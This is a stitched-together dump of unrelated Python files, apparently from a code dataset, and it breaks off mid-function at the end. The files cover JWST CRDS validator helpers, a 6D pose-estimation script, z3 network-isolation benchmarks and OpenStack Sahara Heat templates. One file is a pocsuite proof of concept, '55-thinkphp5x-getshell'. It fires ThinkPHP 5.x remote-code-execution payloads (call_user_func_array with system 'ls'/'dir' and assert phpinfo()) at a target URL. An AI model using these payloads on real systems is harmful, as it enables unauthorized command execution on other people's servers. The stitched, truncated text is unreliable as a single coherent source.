# def nir_filter(instrument, reftype, exp_type):
# """Return True if a SCI, ERR, or DQ array is appropriate for the specified
# JWST NIR instrument, reftype, and exp_type. This can be used to filter
# out NIR SCI,ERR,DQ array definitions for those NIRSPEC modes and types
# that don't define them. The logic is too complex to inline.
#
# >>> nir_filter("NIRSPEC", "SFLAT", "NRS_MSASPEC")
# True
# >>> nir_filter("NIRSPEC", "SFLAT", "NRS_IFU")
# True
# >>> nir_filter("NIRSPEC", "SFLAT", "NRS_FIXEDSLIT")
# False
# >>> nir_filter("NIRSPEC", "SFLAT", "NRS_BRIGHTOBJ")
# False
#
# >>> nir_filter("NIRSPEC", "DFLAT", "ANY")
# True
#
# >>> nir_filter("NIRSPEC", "FFLAT", "NRS_MSASPEC")
# True
# >>> nir_filter("NIRSPEC", "FFLAT", "NRS_IFU")
# False
# >>> nir_filter("NIRSPEC", "FFLAT", "NRS_FIXEDSLIT")
# False
# >>> nir_filter("NIRSPEC", "FFLAT", "NRS_BRIGTOBJ")
# False
#
# """
# assert instrument != "MIRI", "nir_filter() .tpn function should only be called for NIR-detector based instruments."
# if instrument == "NIRSPEC":
# if reftype == "SFLAT":
# return exp_type in ["NRS_MSASPEC","NRS_IFU"]
# elif reftype == "DFLAT":
# return True
# elif reftype == "FFLAT":
# return exp_type in ["NRS_MSASPEC"]
# elif reftype == "AREA":
# return is_imaging_mode(exp_type)
# else:
# return True
# else:
# return True
# ----------------------------------------------------------------------------
# These are presence field helpers that mutate a True value of a presence expression
# into one of the non-boolean presence flags. This enables combining presence values
# like "O" with presence expressions. In general, when an expression is True then
# the presence character of the wrapper helper is returned, e.g.:
#
# (OPTIONAL(True)) --> "O"
# (OPTIONAL(False)) --> False, constraint not evaluated.
#
# This enables having constraints which are conditionally optional, so e.g. a constraint
# on a keyword can be made to apply only when some other header expression holds.
def optional(flag=True):
"""When this flag is True, an exception should be issued if the related keyword/element is
defined and the constraint fails. If the keyword/element is not defined or `flag` is False,
the constraint should be ignored. Returns "O" or False
>>> optional(True)
'O'
>>> optional(False)
False
"""
return "O" if flag else False
def required(flag=True):
"""When this flag is True, an exception should be issued if the related keyword/element is
not defined. Returns "R" or False.
>>> required(True)
'R'
>>> required(False)
False
"""
return "R" if flag else False
def warning(flag=True):
"""Presence condition mutator/wrapper:
When flag is True, a warning should be issued if the related keyword/element is
not defined. Returns "W" or False.
>>> warning(True)
'W'
>>> warning(False)
False
"""
return "W" if flag else False
def warn_only(flag):
"""Expression constraint mutator/wrapper:
    When flag is True, the wrapped expression was satisfied, so return True
signaling a passed validator expression.
If the flag is False, the expression evaluated successfully but was not
    satisfied. Return the value "W" signaling that only a warning should be
issued rather than an exception or error.
>>> warn_only(True)
True
>>> warn_only(False)
'W'
"""
return "W" if not flag else True
def subarray(flag=True):
"""When this flag is True, the related constraint should be applied if
is_full_frame(SUBARRAY) is False. Returns "S" or False.
>>> subarray(True)
'S'
>>> subarray(False)
False
"""
return "S" if flag else False
def full_frame(flag=True):
"""When this flag is True, the related constraint should be applied if
is_full_frame(SUBARRAY) is True. Returns "F" or False.
>>> full_frame(True)
'F'
>>> full_frame(False)
False
"""
return "F" if flag else False
def all_subarray(flag=True):
"""When `flag` is True, mark this constraint as applying to all SUBARRAY forms,
including full frame, as long as SUBARRAY is defined. Returns "A" or False.
>>> all_subarray(True)
'A'
>>> all_subarray(False)
False
"""
return "A" if flag else False
# ----------------------------------------------------------------------------
def ndim(array, dims):
"""Return True IFF CRDS `array` object has number of dimensions `dims`.
>>> array = utils.Struct({"KIND":"IMAGE", "SHAPE" : (2048,2048), "TYPE": "float32"})
>>> ndim(array, 2)
True
>>> ndim(array, 3)
False
"""
return len(array.SHAPE) == dims
# ----------------------------------------------------------------------------
def test():
import doctest
from crds.certify import validator_helpers
return doctest.testmod(validator_helpers)
if __name__ == "__main__":
print(test())
| 31.605727
| 122
| 0.602899
|
2e20cff6622c53d6954e4102d4682605c41a9285
| 4,175
|
py
|
Python
|
pose.py
|
ecr23xx/kp6d
|
aef34c7893f06a93f8af5241ed4bbe36bf5dc884
|
[
"MIT"
] | 3
|
2019-10-14T06:16:44.000Z
|
2020-01-30T19:25:48.000Z
|
pose.py
|
ECer23/kp6d
|
aef34c7893f06a93f8af5241ed4bbe36bf5dc884
|
[
"MIT"
] | 1
|
2019-11-23T13:19:25.000Z
|
2019-11-25T13:06:16.000Z
|
pose.py
|
ECer23/kp6d
|
aef34c7893f06a93f8af5241ed4bbe36bf5dc884
|
[
"MIT"
] | 2
|
2019-08-09T18:34:23.000Z
|
2019-11-21T01:54:47.000Z
|
import os
import sys
import cv2
import pickle
import argparse
from tqdm import tqdm
from PIL import Image, ImageDraw
from torchvision import transforms
from utils import *
from data.linemod.sixd import SixdToolkit
from detect.eval.src.detector import Detector
from detect.eval.src.dataset import prepare_dataset
from detect.eval.src.config import prepare_cfg, prepare_weight
sys.path.append('./keypoint/train_sppe')
from keypoint.train_sppe.main_fast_inference import InferenNet_fast
from keypoint.train_sppe.utils.eval import getPrediction
from keypoint.train_sppe.utils.img import im_to_torch
def parse_arg():
parser = argparse.ArgumentParser(description='YOLO v3 evaluation')
# parser.add_argument('--bs', type=int, help="Batch size")
parser.add_argument('--reso', type=int, help="Image resolution")
parser.add_argument('--kptype', type=str, help="Keypoint type")
    parser.add_argument('--kpnum', type=int, help="Number of keypoints")
    parser.add_argument('--topk', type=int, help="Number of top-scoring keypoints used for PnP")
parser.add_argument('--gpu', default='0,1,2,3', help="GPU ids")
parser.add_argument('--name', type=str, choices=['linemod-single', 'linemod-occ'])
parser.add_argument('--seq', type=str, help="Sequence number")
parser.add_argument('--ckpt', type=str, help="Checkpoint path")
parser.add_argument('-save', action='store_true', help="Save pose figure")
return parser.parse_args()
args = parse_arg()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
if __name__ == '__main__':
print(args)
bench = SixdToolkit(dataset='hinterstoisser', kpnum=args.kpnum,
kptype=args.kptype, is_train=False)
kp3d = bench.models[args.seq]
_, val_dataloder = prepare_dataset(args.name, args.reso, 1, args.seq)
detector = Detector(
cfgfile=prepare_cfg(args.name),
seq=args.seq,
weightfile=prepare_weight(args.ckpt)
)
pose_model = InferenNet_fast(
dataset=args.name,
kernel_size=5,
seqname=args.seq,
kpnum=args.kpnum,
kptype=args.kptype
).cuda()
tbar = tqdm(val_dataloder)
result = dict()
for batch_idx, (inputs, labels, meta) in enumerate(tbar):
img_path = meta['path'][0]
idx = img_path.split('/')[-1].split('.')[0]
inputs = inputs.cuda()
with torch.no_grad():
# object detection
try:
bboxes, confs = detector.detect(inputs)
except Exception:
# No object found
# print("detection failed")
continue
# keypoint localization
orig_img = cv2.imread(meta['path'][0])
orig_inp = im_to_torch(cv2.cvtColor(orig_img, cv2.COLOR_BGR2RGB))
cropped_inputs, pt1, pt2 = crop_from_dets(
orig_inp, bboxes[0], 320, 256)
hms = pose_model(cropped_inputs.unsqueeze(0).cuda()).cpu()
try:
_, pred_kps, pred_kps_score = getPrediction(
hms, pt1.unsqueeze(0), pt2.unsqueeze(0), 320, 256, 80, 64)
except Exception:
# print("Jump Error frame", idx)
continue
# pose estimation
K = args.topk
best_idx = np.argsort(pred_kps_score[0, :, 0]).flip(0)
best_k = best_idx[:K]
pred_pose = bench.solve_pnp(
bench.kps[args.seq][best_k], pred_kps[0][best_k].numpy())
result[int(idx)] = {
'bbox': bboxes[0].numpy(),
'kps': pred_kps[0].numpy(),
'pose': pred_pose
}
if args.save is True:
f = bench.frames[args.seq][int(idx)]
annot = f['annots'][f['obj_ids'].index(int(args.seq))]
gt_pose = annot['pose']
save_path = os.path.join('./results/pose/%s.png' % idx)
draw_6d_pose(img_path, gt_pose, pred_pose,
kp3d, bench.cam, save_path)
with open('./results/%s.pkl' % args.seq, 'wb') as handle:
pickle.dump(result, handle, protocol=pickle.HIGHEST_PROTOCOL)
print("[LOG] Done!")
| 36.304348
| 86
| 0.610299
|
4e130a2cf53e3e5fd12f2701f44fdaadaa7d8e1c
| 4,754
|
py
|
Python
|
vul/55-thinkphp5x-getshell.py
|
zx273983653/vulscan
|
787397e267c4e6469522ee0abe55b3e98f968d4a
|
[
"MIT"
] | 582
|
2019-02-23T09:23:33.000Z
|
2022-03-31T04:42:08.000Z
|
vul/55-thinkphp5x-getshell.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 6
|
2019-03-20T10:37:48.000Z
|
2020-03-10T06:20:07.000Z
|
vul/55-thinkphp5x-getshell.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 183
|
2019-02-23T06:00:18.000Z
|
2022-03-20T02:17:57.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
# Command line
from pocsuite import pocsuite_cli
# Verification module
from pocsuite import pocsuite_verify
# Attack module
from pocsuite import pocsuite_attack
# Console mode
from pocsuite import pocsuite_console
# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# Convert URL to host
from pocsuite.lib.utils.funs import url2ip
import re
# Base class for the PoC
class webLogicPOC(POCBase):
    vulID = '55'  # SSV ID; use 0 if the PoC is submitted together with the vulnerability report
    version = '1'  # Defaults to 1
    vulDate = '2018-12-11'  # Date the vulnerability was disclosed; use today's date if unknown
    author = 'xiaohuihui1'  # PoC author
    createDate = '2018-12-11'  # Date the PoC was written
    updateDate = '2018-12-11'  # Date the PoC was last updated; defaults to the creation date
    references = ['']  # Reference URLs for the vulnerability; not needed for 0-days
    name = 'thinkphp getshell'  # PoC name
    appPowerLink = ['']  # Vendor homepage
    appName = 'thinkphp getshell'  # Affected application name
    appVersion = 'v5.0.23及v5.1.31以下版本'  # Affected versions (below v5.0.23 and v5.1.31)
    vulType = 'thinkphp getshell'  # Vulnerability type; see the vulnerability type reference table
desc = '''
thinkphp getshell
    '''  # Brief description of the vulnerability
    samples = []  # Sample sites where the PoC was verified successfully
    install_requires = []  # Third-party module dependencies; avoid third-party modules where possible
    cvss = u"严重"  # Severity (严重 = Critical); one of Critical / High / Medium / Low
    # Fingerprinting method
def _fingerprint(self):
pass
    # Verification mode: pocsuite -r 1-redis.py -u 1.1.1.1 --verify
def _verify(self):
        # Call the fingerprinting method
        result = {}
        # Use the configured port if present, otherwise fall back to the default port
import re
import socket
import time
vul_url = "%s"%self.url
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = int(url2ip(vul_url)[1])
else :
_host = url2ip(vul_url)
_port = 80
        # Check whether the port is open
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host,_port))
#print 'Server port is OK!'
except Exception:
return self.save_output(result)
sk.close()
vul_ip = "http://%s:%s/" % (_host, _port)
payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
"index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
"index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222",
"index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"]
payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
"index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
"index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir",
"index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"]
for p in payloads2:
url=vul_ip+p
try:
text = req.get(url,timeout=4).text
if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = p
return self.save_output(result)
except Exception as e:
print e
pass
return self.save_output(result)
    # Attack module
def _attack(self):
return self._verify()
#pass
    # Output the report
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# Register the PoC class
register(webLogicPOC)
| 35.477612
| 149
| 0.604544
|
ecbb530072bcd2a6c2e50d607d8632e645d10ce6
| 1,480
|
py
|
Python
|
tests/single_fw_test_rono.py
|
apanda/modeling
|
e032abd413bb3325ad6e5995abadeef74314f383
|
[
"BSD-3-Clause"
] | 3
|
2017-08-30T05:24:11.000Z
|
2021-02-25T12:17:19.000Z
|
tests/single_fw_test_rono.py
|
apanda/modeling
|
e032abd413bb3325ad6e5995abadeef74314f383
|
[
"BSD-3-Clause"
] | null | null | null |
tests/single_fw_test_rono.py
|
apanda/modeling
|
e032abd413bb3325ad6e5995abadeef74314f383
|
[
"BSD-3-Clause"
] | 2
|
2017-11-15T07:00:48.000Z
|
2020-12-13T17:29:03.000Z
|
from examples import RonoDMZTest, RonoQuarantineTest, RonoHostTest
import z3
import time
import random
import sys
def ResetZ3 ():
z3._main_ctx = None
z3.main_ctx()
z3.set_param('smt.random_seed', random.SystemRandom().randint(0, sys.maxint))
iters = 10
min_hosts = 5
max_hosts = 1000
print "host dmz_time q_time h_time total"
for h in xrange(min_hosts, max_hosts):
for i in xrange(iters):
dmz_time = 0.0
for i in xrange(h):
ResetZ3()
dmz = RonoDMZTest(h, h, h)
start = time.time()
res = dmz.check.CheckIsolationFlowProperty(dmz.outside, dmz.dmz)
assert res.result == z3.sat
stop = time.time()
dmz_time += (stop - start)
q_time = 0.0
for i in xrange(h):
ResetZ3()
quarantine = RonoQuarantineTest(h, h, h)
start = time.time()
res = quarantine.check.CheckIsolationProperty(quarantine.outside, quarantine.quarantine)
assert res.result == z3.unsat
stop = time.time()
q_time += (stop - start)
h_time = 0.0
for i in xrange(h):
ResetZ3()
host = RonoHostTest(h, h, h)
start = time.time()
res = host.check.CheckIsolationProperty(host.outside, host.host)
res2 = host.check.CheckIsolationFlowProperty(host.outside, host.host)
assert res.result == z3.sat and res2.result == z3.unsat
stop = time.time()
h_time += (stop - start)
print "%d %f %f %f %f"%(h, dmz_time, q_time, h_time, dmz_time + q_time + h_time)
| 29.6
| 94
| 0.643919
|
dca261285bbc82d0f6bb050d5c4ada764c11c359
| 23,199
|
py
|
Python
|
sahara/service/heat/templates.py
|
ksshanam/sahara
|
0d259f7a71447cd0cefe4f11184cc2ee335f4e33
|
[
"Apache-2.0"
] | null | null | null |
sahara/service/heat/templates.py
|
ksshanam/sahara
|
0d259f7a71447cd0cefe4f11184cc2ee335f4e33
|
[
"Apache-2.0"
] | null | null | null |
sahara/service/heat/templates.py
|
ksshanam/sahara
|
0d259f7a71447cd0cefe4f11184cc2ee335f4e33
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
import six
import yaml
from sahara.plugins import provisioning as plugin_provisioning
from sahara.service.heat import commons as heat_common
from sahara.utils import cluster as cl
from sahara.utils import general as g
from sahara.utils.openstack import base as b
from sahara.utils.openstack import heat as h
from sahara.utils.openstack import neutron
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
SSH_PORT = 22
INSTANCE_RESOURCE_NAME = "inst"
SERVER_GROUP_NAMES = "servgroups"
AUTO_SECURITY_GROUP_PARAM_NAME = "autosecgroup"
INTERNAL_DESIGNATE_REC = "internal_designate_record"
INTERNAL_DESIGNATE_REV_REC = "internal_designate_reverse_record"
EXTERNAL_DESIGNATE_REC = "external_designate_record"
EXTERNAL_DESIGNATE_REV_REC = "external_designate_reverse_record"
# TODO(vgridnev): Using insecure flag until correct way to pass certificate
# will be invented
WAIT_CONDITION_SCRIPT_TEMPLATE = '''
while true; do
wc_notify --insecure --data-binary '{"status": "SUCCESS"}'
if [ $? -eq 0 ]; then
break
fi
sleep 10
done
'''
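# The literal "wc_notify" above is not a real command: it is substituted at
# template-build time via the "str_replace" block in
# ClusterStack._serialize_instance, which maps it to the wait-condition
# handle's curl_cli attribute.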
heat_engine_opts = [
cfg.BoolOpt(
'heat_enable_wait_condition', default=True,
help="Enable wait condition feature to reduce polling during cluster "
"creation")
]
CONF.register_opts(heat_engine_opts)
def _get_inst_name(ng):
return {
"list_join": [
'-',
[ng.cluster.name.lower(), ng.name.lower(),
{"get_param": "instance_index"}]
]
}
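# Editor's note: at stack-creation time Heat resolves the "list_join" above to a
# name such as "mycluster-worker-0" (cluster and node-group names here are
# illustrative).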
def _get_inst_domain_name(domain):
return {
"list_join": [
'.',
[{"get_attr": [INSTANCE_RESOURCE_NAME, "name"]}, domain]]
}
def _get_aa_group_name(cluster, server_group_index):
return g.generate_aa_group_name(cluster.name, server_group_index)
def _get_port_name(ng):
return {
"list_join": [
'-',
[ng.cluster.name.lower(), ng.name.lower(),
{"get_param": "instance_index"},
"port"]
]
}
def _get_floating_name(ng):
return {
"list_join": [
'-',
[ng.cluster.name.lower(), ng.name.lower(),
{"get_param": "instance_index"},
"floating"]
]
}
def _get_floating_assoc_name(ng):
return {
"list_join": [
'-',
[ng.cluster.name.lower(), ng.name.lower(),
{"get_param": "instance_index"},
"floating", "assoc"]
]
}
def _get_volume_name(ng):
return {
"list_join": [
'-',
[ng.cluster.name.lower(), ng.name.lower(),
{"get_param": "instance_index"},
"volume", {"get_param": "volume_index"}]
]
}
def _get_wc_handle_name(inst_name):
return '%s-wc-handle' % inst_name
def _get_wc_waiter_name(inst_name):
return '%s-wc-waiter' % inst_name
def _get_index_from_inst_name(inst_name):
return inst_name.split('-')[-1]
class ClusterStack(object):
def __init__(self, cluster):
self.cluster = cluster
self.node_groups_extra = {}
self.files = {}
self.last_updated_time = None
self.base_info = (
"Data Processing Cluster by Sahara\n"
"Sahara cluster name: {cluster}\n"
"Sahara engine: {version}".format(
cluster=cluster.name, version=heat_common.HEAT_ENGINE_VERSION)
)
self._current_sg_index = 1
def _node_group_description(self, ng):
return "{info}\nNode group {node_group}".format(
info=self.base_info, node_group=ng.name)
def _asg_for_node_group_description(self, ng):
return ("{info}\n"
"Auto security group for Sahara Node Group: "
"{node_group}".format(info=self.base_info, node_group=ng.name))
def _volume_for_node_group_description(self, ng):
return ("{info}\n"
"Volume for Sahara Node Group {node_group}".format(
node_group=ng.name, info=self.base_info))
def add_node_group_extra(self, node_group_id, node_count,
gen_userdata_func, instances_to_delete=None):
self.node_groups_extra[node_group_id] = {
'node_count': node_count,
'gen_userdata_func': gen_userdata_func,
'instances_to_delete': instances_to_delete
}
def _get_main_template(self, instances_to_delete=None):
outputs = {}
resources = self._serialize_resources(outputs, instances_to_delete)
return yaml.safe_dump({
"heat_template_version": heat_common.HEAT_TEMPLATE_VERSION,
"description": self.base_info,
"resources": resources,
"outputs": outputs
})
def instantiate(self, update_existing, disable_rollback=True,
instances_to_delete=None):
main_tmpl = self._get_main_template(instances_to_delete)
kwargs = {
'stack_name': self.cluster.stack_name,
'timeout_mins': 180,
'disable_rollback': disable_rollback,
'parameters': {},
'template': main_tmpl,
'files': self.files
}
if CONF.heat_stack_tags:
kwargs['tags'] = ",".join(CONF.heat_stack_tags)
log_kwargs = copy.deepcopy(kwargs)
log_kwargs['template'] = yaml.safe_load(log_kwargs['template'])
for filename in log_kwargs['files'].keys():
log_kwargs['files'][filename] = yaml.safe_load(
log_kwargs['files'][filename])
log_kwargs = json.dumps(log_kwargs)
if not update_existing:
LOG.debug("Creating Heat stack with args: \n{args}"
.format(args=log_kwargs))
b.execute_with_retries(h.client().stacks.create, **kwargs)
else:
stack = h.get_stack(self.cluster.stack_name)
self.last_updated_time = stack.updated_time
LOG.debug("Updating Heat stack {stack} with args: \n"
"{args}".format(stack=stack, args=log_kwargs))
b.execute_with_retries(stack.update, **kwargs)
def _get_server_group_name(self):
index = self._current_sg_index
# computing server group index in round robin fashion
if index < self.cluster.anti_affinity_ratio:
self._current_sg_index = (index + 1)
else:
self._current_sg_index = 1
return _get_aa_group_name(self.cluster, self._current_sg_index)
def _need_aa_server_group(self, node_group):
for node_process in node_group.node_processes:
if node_process in self.cluster.anti_affinity:
return True
return False
def _get_anti_affinity_scheduler_hints(self, node_group):
if not self._need_aa_server_group(node_group):
return {}
return {
"scheduler_hints": {
"group": {
"get_param": [SERVER_GROUP_NAMES,
{"get_param": "instance_index"}]
}
}
}
def _serialize_resources(self, outputs, instances_to_delete=None):
resources = {}
if self.cluster.anti_affinity:
# Creating server groups equal to the anti_affinity_ratio
for i in range(1, self.cluster.anti_affinity_ratio):
resources.update(self._serialize_aa_server_group(i))
for ng in self.cluster.node_groups:
resources.update(self._serialize_ng_group(ng, outputs,
instances_to_delete))
for ng in self.cluster.node_groups:
resources.update(self._serialize_auto_security_group(ng))
return resources
def _serialize_ng_group(self, ng, outputs, instances_to_delete=None):
ng_file_name = "file://" + ng.name + ".yaml"
self.files[ng_file_name] = self._serialize_ng_file(ng)
outputs[ng.name + "-instances"] = {
"value": {"get_attr": [ng.name, "instance"]}}
properties = {"instance_index": "%index%"}
if ng.cluster.anti_affinity:
ng_count = ng.count
            # assuming instance_index also starts from index 0
for i in range(0, ng_count - 1):
server_group_name = self._get_server_group_name()
server_group_resource = {
"get_resource": server_group_name
}
properties[SERVER_GROUP_NAMES].insert(i, server_group_resource)
if ng.auto_security_group:
properties[AUTO_SECURITY_GROUP_PARAM_NAME] = {
'get_resource': g.generate_auto_security_group_name(ng)}
removal_policies = []
if self.node_groups_extra[ng.id]['instances_to_delete']:
resource_list = []
for name in self.node_groups_extra[ng.id]['instances_to_delete']:
resource_list.append(_get_index_from_inst_name(name))
removal_policies.append({'resource_list': resource_list})
return {
ng.name: {
"type": "OS::Heat::ResourceGroup",
"properties": {
"count": self.node_groups_extra[ng.id]['node_count'],
"removal_policies": removal_policies,
"resource_def": {
"type": ng_file_name,
"properties": properties
}
}
}
}
def _serialize_ng_file(self, ng):
parameters = {"instance_index": {"type": "string"}}
if ng.cluster.anti_affinity:
parameters[SERVER_GROUP_NAMES] = {"type": "comma_delimited_list",
"default": []}
if ng.auto_security_group:
parameters[AUTO_SECURITY_GROUP_PARAM_NAME] = {'type': "string"}
return yaml.safe_dump({
"heat_template_version": heat_common.HEAT_TEMPLATE_VERSION,
"description": self._node_group_description(ng),
"parameters": parameters,
"resources": self._serialize_instance(ng),
"outputs": {
"instance": {"value": {
"physical_id": {"get_resource": INSTANCE_RESOURCE_NAME},
"name": {"get_attr": [INSTANCE_RESOURCE_NAME, "name"]}
}}}
})
def _serialize_auto_security_group(self, ng):
if not ng.auto_security_group:
return {}
security_group_name = g.generate_auto_security_group_name(ng)
security_group_description = self._asg_for_node_group_description(ng)
res_type = "OS::Neutron::SecurityGroup"
desc_key = "description"
rules_key = "rules"
create_rule = lambda ip_version, cidr, proto, from_port, to_port: {
"ethertype": "IPv{}".format(ip_version),
"remote_ip_prefix": cidr,
"protocol": proto,
"port_range_min": six.text_type(from_port),
"port_range_max": six.text_type(to_port)}
rules = self._serialize_auto_security_group_rules(ng, create_rule)
return {
security_group_name: {
"type": res_type,
"properties": {
desc_key: security_group_description,
rules_key: rules
}
}
}
def _serialize_auto_security_group_rules(self, ng, create_rule):
rules = []
for port in ng.open_ports:
rules.append(create_rule(4, '0.0.0.0/0', 'tcp', port, port))
rules.append(create_rule(6, '::/0', 'tcp', port, port))
rules.append(create_rule(4, '0.0.0.0/0', 'tcp', SSH_PORT, SSH_PORT))
rules.append(create_rule(6, '::/0', 'tcp', SSH_PORT, SSH_PORT))
# open all traffic for private networks
for cidr in neutron.get_private_network_cidrs(ng.cluster):
ip_ver = 6 if ':' in cidr else 4
for protocol in ['tcp', 'udp']:
rules.append(create_rule(ip_ver, cidr, protocol, 1, 65535))
rules.append(create_rule(ip_ver, cidr, 'icmp', 0, 255))
return rules
@staticmethod
def _get_wait_condition_timeout(ng):
configs = ng.cluster.cluster_configs
timeout_cfg = plugin_provisioning.HEAT_WAIT_CONDITION_TIMEOUT
cfg_target = timeout_cfg.applicable_target
cfg_name = timeout_cfg.name
return int(configs.get(cfg_target,
{}).get(cfg_name, timeout_cfg.default_value))
def _serialize_designate_records(self):
if not self.cluster.use_designate_feature():
return {}
hostname = _get_inst_domain_name(self.cluster.domain_name)
return {
INTERNAL_DESIGNATE_REC: {
'type': 'OS::Designate::Record',
'properties': {
'name': hostname,
'type': 'A',
'data': {'get_attr': [
INSTANCE_RESOURCE_NAME, 'networks', 'private', 0]},
'domain': self.cluster.domain_name
}
},
EXTERNAL_DESIGNATE_REC: {
'type': 'OS::Designate::Record',
'properties': {
'name': hostname,
'type': 'A',
'data': {'get_attr': ['floating_ip', 'ip']},
'domain': self.cluster.domain_name
}
}
}
def _serialize_designate_reverse_records(self):
if not self.cluster.use_designate_feature():
return {}
def _generate_reversed_ip(ip):
return {
'list_join': [
'.',
[
{'str_split': ['.', ip, 3]},
{'str_split': ['.', ip, 2]},
{'str_split': ['.', ip, 1]},
{'str_split': ['.', ip, 0]},
'in-addr.arpa.'
]
]
}
hostname = _get_inst_domain_name(self.cluster.domain_name)
return {
INTERNAL_DESIGNATE_REV_REC: {
'type': 'OS::Designate::Record',
'properties': {
'name': _generate_reversed_ip({'get_attr': [
INSTANCE_RESOURCE_NAME, 'networks', 'private', 0]}),
'type': 'PTR',
'data': hostname,
'domain': 'in-addr.arpa.'
}
},
EXTERNAL_DESIGNATE_REV_REC: {
'type': 'OS::Designate::Record',
'properties': {
'name': _generate_reversed_ip(
{'get_attr': ['floating_ip', 'ip']}),
'type': 'PTR',
'data': hostname,
'domain': 'in-addr.arpa.'
}
}
}
def _serialize_instance(self, ng):
resources = {}
properties = {}
inst_name = _get_inst_name(ng)
private_net = self.cluster.neutron_management_network
sec_groups = self._get_security_groups(ng)
        # Check if cluster contains user key-pair and include it in the template.
if self.cluster.user_keypair_id:
properties["key_name"] = self.cluster.user_keypair_id
port_name = _get_port_name(ng)
resources.update(self._serialize_port(
port_name, private_net, sec_groups))
properties["networks"] = [{"port": {"get_resource": "port"}}]
if ng.floating_ip_pool:
resources.update(self._serialize_neutron_floating(ng))
gen_userdata_func = self.node_groups_extra[ng.id]['gen_userdata_func']
key_script = gen_userdata_func(ng, inst_name)
if CONF.heat_enable_wait_condition:
etc_hosts = cl.etc_hosts_entry_for_service('orchestration')
if etc_hosts:
etc_hosts = "echo '%s' | sudo tee -a /etc/hosts" % etc_hosts
tml = [key_script, WAIT_CONDITION_SCRIPT_TEMPLATE]
if etc_hosts:
tml = [key_script, etc_hosts, WAIT_CONDITION_SCRIPT_TEMPLATE]
userdata = {
"str_replace": {
"template": "\n".join(tml),
"params": {
"wc_notify": {
"get_attr": [
_get_wc_handle_name(ng.name),
"curl_cli"
]
}
}
}
}
else:
userdata = key_script
if ng.availability_zone:
properties["availability_zone"] = ng.availability_zone
properties.update(self._get_anti_affinity_scheduler_hints(ng))
properties.update({
"name": inst_name,
"flavor": six.text_type(ng.flavor_id),
"image": ng.get_image_id(),
"admin_user": ng.image_username,
"user_data": userdata
})
resources.update({
INSTANCE_RESOURCE_NAME: {
"type": "OS::Nova::Server",
"properties": properties
}
})
resources.update(self._serialize_designate_records())
resources.update(self._serialize_designate_reverse_records())
resources.update(self._serialize_volume(ng))
resources.update(self._serialize_wait_condition(ng))
return resources
def _serialize_wait_condition(self, ng):
if not CONF.heat_enable_wait_condition:
return {}
return {
_get_wc_handle_name(ng.name): {
"type": "OS::Heat::WaitConditionHandle"
},
_get_wc_waiter_name(ng.name): {
"type": "OS::Heat::WaitCondition",
"depends_on": INSTANCE_RESOURCE_NAME,
"properties": {
"timeout": self._get_wait_condition_timeout(ng),
"handle": {"get_resource": _get_wc_handle_name(ng.name)}
}
}
}
def _serialize_neutron_floating(self, ng):
return {
"floating_ip": {
"type": "OS::Neutron::FloatingIP",
"properties": {
"floating_network_id": ng.floating_ip_pool,
"port_id": {"get_resource": "port"}
}
}
}
def _serialize_port(self, port_name, fixed_net_id, security_groups):
properties = {
"network_id": fixed_net_id,
"replacement_policy": "AUTO",
"name": port_name
}
if security_groups:
properties["security_groups"] = security_groups
return {
"port": {
"type": "OS::Neutron::Port",
"properties": properties,
}
}
def _serialize_volume(self, ng):
if not ng.volumes_size or not ng.volumes_per_node:
return {}
volume_file_name = "file://" + ng.name + "-volume.yaml"
self.files[volume_file_name] = self._serialize_volume_file(ng)
return {
ng.name: {
"type": "OS::Heat::ResourceGroup",
"properties": {
"count": ng.volumes_per_node,
"resource_def": {
"type": volume_file_name,
"properties": {
"volume_index": "%index%",
"instance_index": {"get_param": "instance_index"},
"instance": {"get_resource":
INSTANCE_RESOURCE_NAME}}
}
}
}
}
def _serialize_volume_file(self, ng):
volume_name = _get_volume_name(ng)
